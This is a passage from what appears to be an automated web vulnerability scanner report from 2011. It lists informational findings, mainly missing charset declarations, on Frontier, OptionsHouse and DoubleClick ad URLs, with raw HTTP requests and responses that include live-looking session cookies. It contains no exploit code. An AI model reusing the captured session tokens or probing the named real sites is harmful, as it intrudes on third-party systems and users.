User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

23.29. https://www.frontier.com/Shop/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Request

GET /Shop/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.30. https://www.frontiermobile.com/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /data/

Request

GET /data/ HTTP/1.1
Host: www.frontiermobile.com
Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da933aCMYKM; ASPSESSIONIDSATQTBDS=GGODMNPCPECFKPDLNFBJFLCO

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   FrontierMobil
...[SNIP]...

23.31. https://www.frontiermobile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.frontiermobile.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da933aCMYKM; ASPSESSIONIDSATQTBDS=GGODMNPCPECFKPDLNFBJFLCO; ASP.NET_SessionId=bcv1oo45gbysf4jskjggz355; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   FrontierMobil
...[SNIP]...

23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...

24. HTML does not specify charset  previous  next
There are 32 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2434.Yahoo/B5625836.2

Request

GET /adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,;ord=1315312189? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7409
Date: Tue, 06 Sep 2011 12:29:50 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Aug 15 11:16:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.11

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313094? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6162
Date: Tue, 06 Sep 2011 12:44:58 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.12

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6171
Date: Tue, 06 Sep 2011 12:49:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.396

Request

GET /adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4225
Date: Tue, 06 Sep 2011 12:50:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...

24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Request

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4231
Date: Tue, 06 Sep 2011 12:50:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...

24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3340.dedicatedmedia.com/B5641952.2

Request

GET /adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAAAAAAIQHpNKG9SeSsU___________tFWZOAAAAAAeaCABVAgAAVQIAAAIAAACSQQcA-lUAAAEAAABVU0QAVVNEACwB-gByAwAABQ4AAgMCAQUAAAAAIxWhkwAAAAA./cnd=!qQQLJgi6uwcQkoMdGPqrASAE/referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D2%3Bdcopt%3Dist%3Bsz%3D300x250%3Bord%3D8383746361359954%3F/clickenc=http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F6348%2F9844%2F16043-15.3218925.3243961%3Furl%3D;ord=1315313133? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7753
Date: Tue, 06 Sep 2011 12:45:35 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 15:28:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...

24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.101

Request

GET /adi/N3382.Yahoo/B5116950.101;sz=200x33;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJGZGYk9uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpNjM3OWc2KSk/1/*http://global.ard.yahoo.com/SIG=15eqne3u1/M=999999.999999.999999.999999/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=fFbOn0PDn2k-/J=1315313093313787/K=NgNqbTU98ZoHkdL.F35lww/A=3686340584831398191/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 938
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdi
...[SNIP]...

24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.102

Request

GET /adi/N3382.Yahoo/B5116950.102;sz=120x30;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJElGUE5uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpdGVhY29uKSk/1/*http://global.ard.yahoo.com/SIG=15em73716/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=IFPNn0PDn2k-/J=1315313093313052/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313052? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 936
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdi
...[SNIP]...

24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ober.frontier/$%7BSEG_IDS%7D

Request

GET /adi/ober.frontier/$%7BSEG_IDS%7D HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 622
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:38 GMT
Expires: Tue, 06 Sep 2011 12:45:38 GMT

<HEAD><title>Click here to find out more!</title><script>if (document.all){setTimeout(" location.reload();",60000);}</script></HEAD><!-- Rubicon Project tag -->
<!-- Site: Oberon (No Telecom) Zone
...[SNIP]...

24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ober.frontier/product_119282623

Request

GET /adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 629
Date: Tue, 06 Sep 2011 12:50:49 GMT

<HEAD><title>Click here to find out more!</title><script>if (document.all){setTimeout(" location.reload();",60000);}</script></HEAD><!-- Rubicon Project tag -->
<!-- Site: Oberon (No Telecom) Zone
...[SNIP]...

24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ober.frontier/product_undefined

Request

GET /adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
